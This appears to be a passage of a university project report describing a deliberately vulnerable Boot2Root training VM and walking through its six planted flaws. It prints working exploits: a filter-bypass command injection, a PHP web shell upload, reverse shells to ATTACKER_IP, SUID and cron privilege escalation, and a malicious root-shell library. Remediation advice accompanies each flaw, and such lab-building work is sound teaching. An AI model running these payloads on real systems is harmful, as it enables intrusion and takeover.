  <a href="#vulnerability-discovery-phase" class="md-nav__link">
    <span class="md-ellipsis">
      
        Vulnerability Discovery Phase
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#the-vulnerability-relative-vs-absolute-paths" class="md-nav__link">
    <span class="md-ellipsis">
      
        The Vulnerability: Relative vs Absolute Paths
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#exploitation-chain" class="md-nav__link">
    <span class="md-ellipsis">
      
        Exploitation Chain
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#remediation-multi-layered" class="md-nav__link">
    <span class="md-ellipsis">
      
        Remediation (Multi-Layered)
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
          <li class="md-nav__item">
  <a href="#43-ldso-hijacking-hard" class="md-nav__link">
    <span class="md-ellipsis">
      
        4.3 LD.SO Hijacking – Hard
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="4.3 LD.SO Hijacking – Hard">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#how-the-elf-loader-works" class="md-nav__link">
    <span class="md-ellipsis">
      
        How the ELF Loader Works
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#discovery-finding-the-vulnerable-binary" class="md-nav__link">
    <span class="md-ellipsis">
      
        Discovery: Finding the Vulnerable Binary
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#the-exploit-creating-malicious-library" class="md-nav__link">
    <span class="md-ellipsis">
      
        The Exploit: Creating Malicious Library
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#remediation-hardening" class="md-nav__link">
    <span class="md-ellipsis">
      
        Remediation (Hardening)
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#5-how-to-fix-it-defense-strategies" class="md-nav__link">
    <span class="md-ellipsis">
      
        5. How to Fix It – Defense Strategies
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="5. How to Fix It – Defense Strategies">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#51-fix-priorities" class="md-nav__link">
    <span class="md-ellipsis">
      
        5.1 Fix Priorities
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#52-the-defense-strategy" class="md-nav__link">
    <span class="md-ellipsis">
      
        5.2 The Defense Strategy
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
    </ul>
  
</nav>
                  </div>
                </div>
              </div>
            
          
          
            <div class="md-content" data-md-component="content">
              
              <article class="md-content__inner md-typeset">
                
                  



<h1 id="boot2root-vm-design-waifu-gallery-artificial-vulnerability-orchestration">Boot2Root VM Design: Waifu Gallery – Artificial Vulnerability Orchestration<a class="headerlink" href="#boot2root-vm-design-waifu-gallery-artificial-vulnerability-orchestration" title="Permanent link">&para;</a></h1>
<h2 id="academic-project-design-and-implementation-of-a-controlled-vulnerable-environment">Academic Project: Design and Implementation of a Controlled Vulnerable Environment<a class="headerlink" href="#academic-project-design-and-implementation-of-a-controlled-vulnerable-environment" title="Permanent link">&para;</a></h2>
<p><strong>Project Context:</strong>
- <strong>University:</strong> Sapienza University of Rome, Master's Degree in Cybersecurity
- <strong>Course:</strong> Ethical Hacking &amp; Penetration Testing (A.Y. 2023/24)
- <strong>Target:</strong> Design of a vulnerable virtual machine intended for educational simulations in an exam environment
- <strong>Deliverable:</strong> Working Linux VM + Official technical report + Source code</p>
<p><strong>Technologies &amp; Stack:</strong>
- <strong>Operating System:</strong> Ubuntu 20.04.6 LTS
- <strong>Web Stack:</strong> Apache2 + PHP
- <strong>Backend Logic:</strong> Bash scripting, C (exploit compilation)
- <strong>Implemented Vulnerabilities:</strong> 6 distinct (3 Access Vectors, 3 Privilege Escalation), Easy/Medium/Hard levels
- <strong>Infrastructure:</strong> Git versioning for tracking</p>
<hr />
<h2 id="1-concept-system-architecture">1. Concept &amp; System Architecture<a class="headerlink" href="#1-concept-system-architecture" title="Permanent link">&para;</a></h2>
<h3 id="11-how-we-thought-about-it">1.1 How We Thought About It<a class="headerlink" href="#11-how-we-thought-about-it" title="Permanent link">&para;</a></h3>
<p>The VM had to be based on a real and plausible server, so it was necessary that:</p>
<ol>
<li><strong>It was realistic</strong> – We decided to be inspired by an early 2000s web gallery, as it seemed an optimal solution to have a known and not overly complex type of web app.</li>
<li><strong>It had a plot</strong> – The anime theme was thought of knowing that the prof. was a fan: moreover, there is a sort of internal narrative with various easter eggs and hidden clues.</li>
<li><strong>It was progressive</strong> – Easy vulnerabilities to understand the flow, Medium to learn the bypass for the RCE, Hard for having done correct enumeration and filter bypass for LFI.</li>
</ol>
<p><strong>The Choice: Waifu Gallery</strong>
A board of anime characters from the 90s to mid 2000s. Why? Because it's credible, it's a web service that actually was a thing and they continue to exist and be frequented, the students already knew what we were talking about and there was no excessive complexity of the service that would have caused unnecessary flow slowdowns.</p>
<h3 id="12-architecture-where-we-put-what">1.2 Architecture: Where We Put What<a class="headerlink" href="#12-architecture-where-we-put-what" title="Permanent link">&para;</a></h3>
<p>Every vulnerability had to be in a specific place in the system, to encourage exploration by the attacker:</p>
<table>
<thead>
<tr>
<th>Component</th>
<th>What It Is</th>
<th>Where To Attack</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>Frontend</strong></td>
<td>PHP Gallery with search bar</td>
<td>Web Command Injection (search bar)</td>
</tr>
<tr>
<td><strong>Hidden upload</strong></td>
<td>imposter.php (non-linked)</td>
<td>File Upload double extension bypass</td>
</tr>
<tr>
<td><strong>Backend Filters</strong></td>
<td>Command blacklist + regex</td>
<td>Bypassable with <code>;;</code> and <code>##</code></td>
</tr>
<tr>
<td><strong>System User</strong></td>
<td><code>amogus</code> with password <code>sus1</code></td>
<td>SSH brute-force (name discoverable via UI hint)</td>
</tr>
<tr>
<td><strong>hping3 SUID</strong></td>
<td>Binary with active SUID bit</td>
<td>Instant root shell</td>
</tr>
<tr>
<td><strong>Cronjob</strong></td>
<td>Writable script, executed as root</td>
<td>PATH hijacking</td>
</tr>
<tr>
<td><strong>ld.so config</strong></td>
<td>Library in writable path</td>
<td>Library hijacking + custom assembly</td>
</tr>
</tbody>
</table>
<p><strong>Intended progression:</strong>
- <strong>Easy:</strong> Discover the user from the UI =&gt; SSH brute-force =&gt; find SUID hping3
- <strong>Medium:</strong> Bypass the web search filter =&gt; discover the cronjob, modify it and wait for the root rev. shell
- <strong>Hard:</strong> Find imposter.php and bust the upload filter =&gt; create the malicious C library, replace it, hijack ld.so</p>
<hr />
<h2 id="2-vulnerability-landscape-exploitation-chains">2. Vulnerability Landscape &amp; Exploitation Chains<a class="headerlink" href="#2-vulnerability-landscape-exploitation-chains" title="Permanent link">&para;</a></h2>
<h3 id="21-vulnerability-summary-matrix">2.1 Vulnerability Summary Matrix<a class="headerlink" href="#21-vulnerability-summary-matrix" title="Permanent link">&para;</a></h3>
<table>
<thead>
<tr>
<th>#</th>
<th>Vulnerability Name</th>
<th>Category</th>
<th>Difficulty</th>
<th>Prerequisites</th>
<th>Post-Exploitation</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>3.1</strong></td>
<td>Weak SSH Credentials</td>
<td>Initial Access</td>
<td>⭐ EASY</td>
<td>None (public brute-force)</td>
<td>User shell <code>amogus</code></td>
</tr>
<tr>
<td><strong>3.2</strong></td>
<td>Web Command Injection</td>
<td>RCE</td>
<td>⭐⭐ MEDIUM</td>
<td>Web app access (default)</td>
<td>RCE as www-data user</td>
</tr>
<tr>
<td><strong>3.3</strong></td>
<td>File Upload + Shell Execution</td>
<td>LFI</td>
<td>⭐⭐⭐ HARD</td>
<td>Hidden page recon + upload bypass + execution</td>
<td>www-data shell + persistent backdoor</td>
</tr>
<tr>
<td><strong>4.1</strong></td>
<td>SUID Binary Exploitation (hping3)</td>
<td>Privilege Escalation</td>
<td>⭐ EASY</td>
<td>Non-root user shell</td>
<td>Instant root shell</td>
</tr>
<tr>
<td><strong>4.2</strong></td>
<td>Insecure Cronjob PATH</td>
<td>Privilege Escalation</td>
<td>⭐⭐ MEDIUM</td>
<td>User access + timing wait</td>
<td>Root shell (from reverse shell)</td>
</tr>
<tr>
<td><strong>4.3</strong></td>
<td>LD_LIBRARY_PATH Hijacking</td>
<td>Privilege Escalation</td>
<td>⭐⭐⭐ HARD</td>
<td>SUID binary + writable library path + C compilation skills</td>
<td>Root shell</td>
</tr>
</tbody>
</table>
<h3 id="22-attack-chain-visualization">2.2 Attack Chain Visualization<a class="headerlink" href="#22-attack-chain-visualization" title="Permanent link">&para;</a></h3>
<div class="highlight"><pre><span></span><code>┌────────────────────────────────────────────────────────┐
│ INITIAL ACCESS                                         │
│ ├─ [3.1] SSH brute-force (amogus:sus1)     ← Easiest   │
│ └─ [3.1] HTTP Reconnaissance → UI hints                │
└────────────────────┬───────────────────────────────────┘
                     │
                     ▼
┌────────────────────────────────────────────────────────┐
│ LATERAL MOVEMENT / WEB RCE                             │
│ ├─ [3.2] Command Injection via search bar  ← Via ;;##  │
│ │         shell_exec() bypass                          │
│ └─ [3.3] Hidden upload page (imposter.php)             │
│          shell.php.jpg double extension bypass         │
└────────────────────┬───────────────────────────────────┘
                     │
                     ▼
┌────────────────────────────────────────────────────────┐
│ PRIVILEGE ESCALATION (Choose One)                      │
│ ├─ [4.1] SUID hping3 → /bin/sh -p          ← Easy      │
│ ├─ [4.2] Cronjob PATH manipulation                     │
│ └─ [4.3] LD_LIBRARY_PATH hijacking         ← Hard      │
└────────────────────────────────────────────────────────┘
</code></pre></div>
<p><strong>Educational Key:</strong>
Every level demonstrates real concepts encountered in professional engagements:
- <strong>Easy:</strong> Basic reconnaissance + weak credentials + OSINT
- <strong>Medium:</strong> Insufficient sanitization + misunderstanding of shell metacharacters
- <strong>Hard:</strong> Deep understanding of ELF loader + exploitation of complex privilege boundaries</p>
<hr />
<h2 id="3-access-vulnerabilities-personal-implementation">3. Access Vulnerabilities (Personal Implementation)<a class="headerlink" href="#3-access-vulnerabilities-personal-implementation" title="Permanent link">&para;</a></h2>
<p>In this section, the entry vectors designed and implemented to allow the attacker to gain initial access to the system are described.</p>
<h3 id="31-weak-ssh-credentials-easy-mode">3.1 Weak SSH Credentials – Easy Mode<a class="headerlink" href="#31-weak-ssh-credentials-easy-mode" title="Permanent link">&para;</a></h3>
<h4 id="setup">Setup<a class="headerlink" href="#setup" title="Permanent link">&para;</a></h4>
<p>The user <code>amogus</code> with password <code>sus1</code> is the first clue. The name is a reference to Among Us (the game), which at the time was famous in our study groups. We knew the other students would recognize it.</p>
<p>The password is not in the UI anywhere, but the name is: randomly opening the DevTool one of the images will be as follows:
<div class="highlight"><pre><span></span><code><span class="p">&lt;</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">&quot;...&quot;</span> <span class="na">title</span><span class="o">=</span><span class="s">&quot;amogus&quot;</span> <span class="err">...</span><span class="p">&gt;</span>
</code></pre></div></p>
<p>Furthermore, there is a visual clue hidden in the home page: an image in the grid is randomly chosen among the last rows, hovering the pointer, the Ascii art of <em>Among Us</em> will appear in transparency. The clue was placed to reward searching image by image, its position also being random. </p>
<p>So to solve this vulnerability you need:
1. Observe the UI (open browser inspector)
2. Identify the hidden title
3. Attempt brute-force on SSH with that name</p>
<h4 id="the-exploit">The Exploit<a class="headerlink" href="#the-exploit" title="Permanent link">&para;</a></h4>
<div class="highlight"><pre><span></span><code><span class="c1"># Reconnaissance: hover over an image, see the tooltip</span>
<span class="c1"># Or F12 → Inspector, search title attribute</span>

<span class="c1"># SSH Brute-force (or dictionary for near-instant solution)</span>
hydra<span class="w"> </span>-l<span class="w"> </span>amogus<span class="w"> </span>-P<span class="w"> </span>wordlist.txt<span class="w"> </span>ssh://&lt;vm_ip&gt;
<span class="c1"># Later: ssh amogus@&lt;vm_ip&gt; with password &quot;sus1&quot;</span>
</code></pre></div>
<p>It's Easy because there's no hidden logic: the name is visible in the UI, the password is trivial. The only "effort" is understanding you have to use SSH, also because in the web app there are no login forms or anything else. Furthermore, <em>sus</em> is the term most closely related to <em>amogus</em>, so creating the wordlist is very fast.</p>
<h3 id="32-web-command-injection-medium-mode">3.2 Web Command Injection – Medium Mode<a class="headerlink" href="#32-web-command-injection-medium-mode" title="Permanent link">&para;</a></h3>
<h4 id="the-vulnerability">The Vulnerability<a class="headerlink" href="#the-vulnerability" title="Permanent link">&para;</a></h4>
<p>The search bar searches for images with <code>shell_exec("ls $image_folder$query*.jpg")</code>. The filter was blacklist-based: blocks <code>bash</code>, <code>nc</code>, <code>wget</code>, specific commands. However, we deliberately left a hole.</p>
<p>If you use <code>;</code> or <code>#</code> directly, those are blocked. BUT if you use <code>;;</code> or <code>##</code>, the filter only recognizes the first one leaving out the second character allowing code injection. Then there's an <code>str_replace()</code> that converts them to singles (inserted for convenience in the RCE execution, without creating artificial difficulty):
<div class="highlight"><pre><span></span><code><span class="x">if (strpos($query, &quot;;;&quot;) !== false &amp;&amp; strpos($query, &quot;##&quot;) !== false) {</span>
<span class="x">    $query = str_replace(&quot;;;&quot;, &quot;;&quot;, $query);    // ;; -&gt; ;</span>
<span class="x">    $query = str_replace(&quot;##&quot;, &quot;#&quot;, $query);    // ## -&gt; #</span>
<span class="x">}</span>
</code></pre></div></p>
<p>The check happens BEFORE the substitution. Therefore <code>;;ls /##</code> passes the filter because <code>;;</code> is not <code>;</code>, it gets not blocked. Had it been done AFTER, it would have been blocked, which is what happens for all other injection types.</p>
<h4 id="how-to-solve-it">How to Solve It<a class="headerlink" href="#how-to-solve-it" title="Permanent link">&para;</a></h4>
<div class="highlight"><pre><span></span><code><span class="c1"># Direct payloads</span>
<span class="p">;;</span>ls<span class="w"> </span>/##<span class="w">             </span><span class="c1"># Lists root directory</span>
<span class="p">;;</span>cat<span class="w"> </span>/etc/passwd##<span class="w">  </span><span class="c1"># Reads sensitive files</span>
<span class="p">;;</span>whoami##<span class="w">           </span><span class="c1"># See who you are</span>

<span class="c1"># More complex payloads (reverse shell):</span>
<span class="p">;;</span>bash<span class="w"> </span>-i<span class="w"> </span>&gt;<span class="p">&amp;</span><span class="w"> </span>/dev/tcp/ATTACKER_IP/7777<span class="w"> </span><span class="m">0</span>&gt;<span class="p">&amp;</span><span class="m">1</span><span class="c1">##</span>
</code></pre></div>
<p><strong>Defense:</strong>
Do not use <code>shell_exec</code> with user input. Or if you do:
1. <strong>Whitelist</strong> – only accept safe characters: <code>preg_replace('/[^a-zA-Z0-9_-]/', '', $query)</code>
2. <strong>escapeshellarg()</strong> – if you really must use shell_exec: <code>escapeshellarg($query)</code>
3. <strong>Better: PHP native</strong> – <code>glob("images/{$query}*.jpg")</code> without shell</p>
<h3 id="33-file-upload-bypass-hard-mode">3.3 File Upload Bypass – Hard Mode<a class="headerlink" href="#33-file-upload-bypass-hard-mode" title="Permanent link">&para;</a></h3>
<h4 id="the-idea">The Idea<a class="headerlink" href="#the-idea" title="Permanent link">&para;</a></h4>
<p>We created a hidden page <code>imposter.php</code> that is not linked anywhere. If you find it and access it, you can upload a file.</p>
<p>The filter only checks the final extension via <code>pathinfo()</code>. Therefore:
- <code>shell.php.jpg</code> → extension = <code>.jpg</code> ✅ passes the filter
- But the file saves as <code>shell.php.jpg</code> and if Apache executes it as PHP → RCE</p>
<h4 id="how-to-find-it">How to Find It<a class="headerlink" href="#how-to-find-it" title="Permanent link">&para;</a></h4>
<div class="highlight"><pre><span></span><code><span class="c1"># 1. Brute force</span>
gobuster<span class="w"> </span>dir<span class="w"> </span>-u<span class="w"> </span>http://&lt;vm_ip&gt;<span class="w"> </span>-w<span class="w"> </span>/usr/share/wordlists/common.txt
<span class="c1"># Discover imposter.php</span>

<span class="c1"># 2. Or if you have RCE from the command injection:</span>
cat<span class="w"> </span>index.php<span class="w"> </span><span class="p">|</span><span class="w"> </span>grep<span class="w"> </span>-i<span class="w"> </span><span class="s2">&quot;upload\|form\|POST&quot;</span><span class="w">  </span><span class="c1"># Find links to imposter.php</span>
</code></pre></div>
<h4 id="the-exploit_1">The Exploit<a class="headerlink" href="#the-exploit_1" title="Permanent link">&para;</a></h4>
<div class="highlight"><pre><span></span><code><span class="c1"># Create a web shell</span>
<span class="nb">echo</span><span class="w"> </span><span class="s1">&#39;&lt;?php system($_GET[&quot;cmd&quot;]); ?&gt;&#39;</span><span class="w"> </span>&gt;<span class="w"> </span>shell.php

<span class="c1"># Rename with double extension</span>
mv<span class="w"> </span>shell.php<span class="w"> </span>shell.php.jpg

<span class="c1"># Upload</span>
curl<span class="w"> </span>-F<span class="w"> </span><span class="s2">&quot;image=@shell.php.jpg&quot;</span><span class="w"> </span>http://&lt;vm_ip&gt;/imposter.php

<span class="c1"># Execute</span>
curl<span class="w"> </span><span class="s2">&quot;http://&lt;vm_ip&gt;/images/shell.php.jpg?cmd=id&quot;</span>
<span class="c1"># uid=33(www-data) ...</span>
</code></pre></div>
<h4 id="defense">Defense<a class="headerlink" href="#defense" title="Permanent link">&para;</a></h4>
<ol>
<li><strong>Check magic bytes</strong> – Not extension. <code>getimagesize()</code> verifies if it's really an image</li>
<li><strong>Rename the file</strong> - Generate random name: <code>bin2hex(random_bytes(16)) . ".jpg"</code></li>
<li><strong>Store outside webroot</strong> - Save in <code>/var/uploads/</code>, not where Apache can execute</li>
<li><strong>Disable PHP execution</strong> in the upload folder (.htaccess or web.config)</li>
</ol>
<h2 id="4-privilege-escalation-how-to-become-root">4. Privilege Escalation – How to Become Root<a class="headerlink" href="#4-privilege-escalation-how-to-become-root" title="Permanent link">&para;</a></h2>
<h3 id="41-suid-hping3-easy">4.1 SUID hping3 – Easy<a class="headerlink" href="#41-suid-hping3-easy" title="Permanent link">&para;</a></h3>
<h4 id="what-is-hping3">What is hping3?<a class="headerlink" href="#what-is-hping3" title="Permanent link">&para;</a></h4>
<p><code>hping3</code> is a packet crafting tool, similar to <code>ping</code> but on steroids. It's used to test firewalls, create custom packets, stuff like that. It should NEVER have SUID.</p>
<h4 id="the-exploit_2">The Exploit<a class="headerlink" href="#the-exploit_2" title="Permanent link">&para;</a></h4>
<div class="highlight"><pre><span></span><code><span class="c1"># Enumerate SUID binaries</span>
find<span class="w"> </span>/<span class="w"> </span>-perm<span class="w"> </span>-4000<span class="w"> </span>-type<span class="w"> </span>f<span class="w"> </span><span class="m">2</span>&gt;/dev/null<span class="w"> </span><span class="p">|</span><span class="w"> </span>grep<span class="w"> </span>hping
<span class="c1"># Output: /usr/sbin/hping3</span>

<span class="c1"># Execute hping3 (which is SUID root)</span>
$<span class="w"> </span>/usr/sbin/hping3
hping3<span class="w"> </span>&gt;<span class="w"> </span>/bin/sh<span class="w"> </span>-p

<span class="c1"># Boom, you&#39;re root</span>
$<span class="w"> </span>whoami
root
</code></pre></div>
<p>The <code>-p</code> flag of <code>/bin/sh</code> is critical: "preserve mode". Without it, the shell drops privileges automatically.</p>
<h4 id="why-it-works">Why it works<a class="headerlink" href="#why-it-works" title="Permanent link">&para;</a></h4>
<p><code>hping3</code> with SUID executes as root. Inside hping3 there is a shell escape functionality. Ask for a shell, and the process (which is root) gives it to you. Easy.</p>
<h4 id="defense_1">Defense<a class="headerlink" href="#defense_1" title="Permanent link">&para;</a></h4>
<div class="highlight"><pre><span></span><code><span class="c1"># Remove SUID</span>
chmod<span class="w"> </span>-s<span class="w"> </span>/usr/sbin/hping3

<span class="c1"># Or use sudo with logging</span>
</code></pre></div>
<h3 id="42-cronjob-path-hijacking-medium">4.2 Cronjob PATH Hijacking – Medium<a class="headerlink" href="#42-cronjob-path-hijacking-medium" title="Permanent link">&para;</a></h3>
<h4 id="how-it-works">How it Works<a class="headerlink" href="#how-it-works" title="Permanent link">&para;</a></h4>
<p>Cronjob (cron) is a Linux scheduler that executes scripts periodically. If:
- The script is executed <strong>as root</strong> but is <strong>writable by non-root</strong>
- And uses a <strong>relative path</strong> to execute commands</p>
<p>Then we hijack the executables by adding a fake directory to the PATH where we create our own executables with the same name. When cron executes the command, it finds our fake one.</p>
<h4 id="vulnerability-discovery-phase">Vulnerability Discovery Phase<a class="headerlink" href="#vulnerability-discovery-phase" title="Permanent link">&para;</a></h4>
<p><strong>Step 1: Identify the "overwrite.sh" script</strong>
<div class="highlight"><pre><span></span><code>find<span class="w"> </span>/<span class="w"> </span>-name<span class="w"> </span><span class="s2">&quot;overwrite.sh&quot;</span><span class="w"> </span>-type<span class="w"> </span>f<span class="w"> </span>-writable<span class="w"> </span><span class="m">2</span>&gt;/dev/null
<span class="c1"># Output: /home/developer/overwrite.sh</span>
</code></pre></div></p>
<p><strong>Step 2: Examine the script content</strong>
<div class="highlight"><pre><span></span><code>cat<span class="w"> </span>/home/developer/overwrite.sh
<span class="c1"># Output uses RELATIVE paths:</span>
<span class="c1"># ls /          (instead of: /bin/ls /)</span>
<span class="c1"># whoami        (instead of: /usr/bin/whoami)</span>
<span class="c1"># id            (instead of: /usr/bin/id)</span>
</code></pre></div></p>
<h4 id="the-vulnerability-relative-vs-absolute-paths">The Vulnerability: Relative vs Absolute Paths<a class="headerlink" href="#the-vulnerability-relative-vs-absolute-paths" title="Permanent link">&para;</a></h4>
<p><strong>How PATH hijacking works:</strong>
When cron executes the script with PATH like <code>/home/developer:/usr/bin:/bin</code>:
<div class="highlight"><pre><span></span><code>When script executes: ls
System searches:
1. /home/developer/ls        ← Attacker CREATES THIS
2. /usr/bin/ls
3. /bin/ls

Result: Attacker&#39;s malicious /home/developer/ls executes as root!
</code></pre></div></p>
<h4 id="exploitation-chain">Exploitation Chain<a class="headerlink" href="#exploitation-chain" title="Permanent link">&para;</a></h4>
<p><strong>Step 1: Create malicious executable</strong>
<div class="highlight"><pre><span></span><code>cat<span class="w"> </span>&gt;<span class="w"> </span>/home/developer/ls<span class="w"> </span><span class="s">&lt;&lt; &#39;EOF&#39;</span>
<span class="s"># This will execute as ROOT because cron runs as root!</span>
<span class="s">bash -i &gt;&amp; /dev/tcp/ATTACKER_IP/7777 0&gt;&amp;1</span>
<span class="s">EOF</span>
chmod<span class="w"> </span>+x<span class="w"> </span>/home/developer/ls
</code></pre></div></p>
<p><strong>Step 2: Set up listener</strong>
<div class="highlight"><pre><span></span><code>nc<span class="w"> </span>-lnvp<span class="w"> </span><span class="m">7777</span>
<span class="c1"># Waiting for reverse shell...</span>
</code></pre></div></p>
<p><strong>Step 3: Wait for cron execution</strong>
<div class="highlight"><pre><span></span><code><span class="c1"># Cron will execute overwrite.sh at scheduled time (e.g., every minute)</span>
<span class="c1"># When it runs &quot;ls /&quot; inside the script:</span>
<span class="c1"># It looks for &quot;ls&quot; in PATH</span>
<span class="c1"># Finds /home/developer/ls</span>
<span class="c1"># Executes OUR malicious script as root</span>
</code></pre></div></p>
<p><strong>Step 4: Get root shell</strong>
<div class="highlight"><pre><span></span><code>root@vm:/#<span class="w"> </span>id
<span class="nv">uid</span><span class="o">=</span><span class="m">0</span><span class="o">(</span>root<span class="o">)</span><span class="w"> </span><span class="nv">gid</span><span class="o">=</span><span class="m">0</span><span class="o">(</span>root<span class="o">)</span><span class="w"> </span><span class="nv">groups</span><span class="o">=</span><span class="m">0</span><span class="o">(</span>root<span class="o">)</span>
</code></pre></div></p>
<h4 id="remediation-multi-layered">Remediation (Multi-Layered)<a class="headerlink" href="#remediation-multi-layered" title="Permanent link">&para;</a></h4>
<p><strong>Layer 1: Use absolute paths in scripts (PRIMARY)</strong>
<div class="highlight"><pre><span></span><code><span class="c1"># SECURE: All paths are absolute</span>
/bin/ls<span class="w"> </span>/
/usr/bin/whoami
/usr/bin/id
/bin/cat<span class="w"> </span>/etc/passwd
</code></pre></div></p>
<p><strong>Layer 2: Set restrictive PATH in cronjob</strong>
<div class="highlight"><pre><span></span><code># In /etc/cron.d/example:
PATH=/bin:/usr/bin
SHELL=/bin/bash
* * * * * root /home/developer/overwrite.sh &gt; /dev/null 2&gt;&amp;1
</code></pre></div></p>
<p><strong>Layer 3: Make scripts non-writable by non-root</strong>
<div class="highlight"><pre><span></span><code>chmod<span class="w"> </span><span class="m">750</span><span class="w"> </span>/home/developer/overwrite.sh
<span class="c1"># Now only owner (root) and group can modify</span>
</code></pre></div></p>
<h3 id="43-ldso-hijacking-hard">4.3 LD.SO Hijacking – Hard<a class="headerlink" href="#43-ldso-hijacking-hard" title="Permanent link">&para;</a></h3>
<h4 id="how-the-elf-loader-works">How the ELF Loader Works<a class="headerlink" href="#how-the-elf-loader-works" title="Permanent link">&para;</a></h4>
<p>The ELF loader (<code>ld.so</code>) resolves dynamic libraries that a program needs at runtime. It follows a specific search order:</p>
<div class="highlight"><pre><span></span><code><span class="m">1</span>.<span class="w"> </span>LD_LIBRARY_PATH<span class="w"> </span><span class="o">(</span>environment<span class="w"> </span>variable<span class="o">)</span>
<span class="m">2</span>.<span class="w"> </span>/etc/ld.so.cache<span class="w"> </span><span class="o">(</span>compiled<span class="w"> </span>cache<span class="o">)</span>
<span class="m">3</span>.<span class="w"> </span>/etc/ld.so.conf<span class="w"> </span>and<span class="w"> </span>/etc/ld.so.conf.d/<span class="w"> </span><span class="o">(</span>system<span class="w"> </span>config<span class="o">)</span>
<span class="m">4</span>.<span class="w"> </span>Standard<span class="w"> </span>dirs:<span class="w"> </span>/lib,<span class="w"> </span>/usr/lib,<span class="w"> </span>/lib64,<span class="w"> </span>/usr/lib64
</code></pre></div>
<p>If a SUID binary searches for a library in a <strong>writable</strong> directory, we can put our malware version in there and the SUID binary loads it.</p>
<h4 id="discovery-finding-the-vulnerable-binary">Discovery: Finding the Vulnerable Binary<a class="headerlink" href="#discovery-finding-the-vulnerable-binary" title="Permanent link">&para;</a></h4>
<p><strong>Step 1: Check for non-standard library paths</strong>
<div class="highlight"><pre><span></span><code><span class="c1"># Check /etc/ld.so.conf.d/ for unusual paths:</span>
ls<span class="w"> </span>-la<span class="w"> </span>/etc/ld.so.conf.d/
cat<span class="w"> </span>/etc/ld.so.conf.d/*<span class="w"> </span><span class="p">|</span><span class="w"> </span>grep<span class="w"> </span>-v<span class="w"> </span><span class="s2">&quot;^#&quot;</span>
<span class="c1"># Output might include: /home/developer/libs</span>

<span class="c1"># Verify if path is writable by non-root:</span>
ls<span class="w"> </span>-la<span class="w"> </span>/home/developer/libs
</code></pre></div></p>
<p><strong>Step 2: Find SUID binary with missing library</strong>
<div class="highlight"><pre><span></span><code>find<span class="w"> </span>/<span class="w"> </span>-perm<span class="w"> </span>-4000<span class="w"> </span>-type<span class="w"> </span>f<span class="w"> </span><span class="m">2</span>&gt;/dev/null

<span class="c1"># For each binary, check what libraries it needs:</span>
ldd<span class="w"> </span>/usr/sbin/testingapp
<span class="c1"># Output example:</span>
<span class="c1">#   libcustomapp.so =&gt; not found              ← MISSING LIBRARY!</span>
<span class="c1">#   libc.so.6 =&gt; /lib/x86_64-linux-gnu/libc.so.6</span>
</code></pre></div></p>
<h4 id="the-exploit-creating-malicious-library">The Exploit: Creating Malicious Library<a class="headerlink" href="#the-exploit-creating-malicious-library" title="Permanent link">&para;</a></h4>
<p><strong>Step 1: Create malicious libcustomapp.so</strong>
<div class="highlight"><pre><span></span><code><span class="c1">// malicious_libcustomapp.c</span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;unistd.h&gt;</span>
<span class="kt">void</span><span class="w"> </span><span class="nf">functionLoader</span><span class="p">()</span><span class="w"> </span><span class="p">{</span>
<span class="w">    </span><span class="n">setuid</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span><span class="w">      </span><span class="c1">// Set UID to root</span>
<span class="w">    </span><span class="n">setgid</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span><span class="w">      </span><span class="c1">// Set GID to root</span>
<span class="w">    </span><span class="n">system</span><span class="p">(</span><span class="s">&quot;/bin/sh&quot;</span><span class="p">);</span><span class="w">  </span><span class="c1">// Spawn shell as root</span>
<span class="p">}</span>
</code></pre></div></p>
<p><strong>Step 2: Compile the malicious library</strong>
<div class="highlight"><pre><span></span><code>gcc<span class="w"> </span>-shared<span class="w"> </span>-fPIC<span class="w"> </span>-o<span class="w"> </span>libcustomapp.so<span class="w"> </span>malicious_libcustomapp.c

<span class="c1"># Verify it was created:</span>
file<span class="w"> </span>libcustomapp.so
</code></pre></div></p>
<p><strong>Step 3: Place library in the vulnerable directory</strong>
<div class="highlight"><pre><span></span><code>cp<span class="w"> </span>libcustomapp.so<span class="w"> </span>/home/developer/libs/

<span class="c1"># Verify placement:</span>
ls<span class="w"> </span>-la<span class="w"> </span>/home/developer/libs/libcustomapp.so
</code></pre></div></p>
<p><strong>Step 4: Execute the vulnerable binary</strong>
<div class="highlight"><pre><span></span><code>/usr/sbin/testingapp

<span class="c1"># What happens:</span>
<span class="c1"># 1. testingapp starts (SUID means it runs as root)</span>
<span class="c1"># 2. ELF loader searches for libcustomapp.so</span>
<span class="c1"># 3. Finds our malicious /home/developer/libs/libcustomapp.so FIRST</span>
<span class="c1"># 4. Loads OUR library which calls setuid(0) + system(&quot;/bin/sh&quot;)</span>
<span class="c1"># 5. Shell prompt appears as root!</span>

<span class="c1"># Result:</span>
<span class="c1"># # whoami</span>
<span class="c1"># root</span>
</code></pre></div></p>
<h4 id="remediation-hardening">Remediation (Hardening)<a class="headerlink" href="#remediation-hardening" title="Permanent link">&para;</a></h4>
<p><strong>Layer 1: Use absolute paths + remove unsafe entries</strong>
<div class="highlight"><pre><span></span><code><span class="c1"># Remove or comment out:</span>
cat<span class="w"> </span>/etc/ld.so.conf.d/custom.conf
<span class="c1"># /home/developer/libs   ← REMOVE THIS</span>

<span class="c1"># Rebuild the loader cache:</span>
sudo<span class="w"> </span>ldconfig
</code></pre></div></p>
